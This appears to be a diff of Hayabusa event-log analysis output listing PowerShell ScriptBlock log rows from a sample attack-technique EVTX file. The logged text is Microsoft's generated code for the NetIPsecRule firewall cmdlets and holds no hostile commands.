Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Dependents'; ParameterType = 'Microsoft.M",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"anagement.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetIPsecRule' function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Find-NetIPsecRule' function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, Value",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"FromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) {",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { 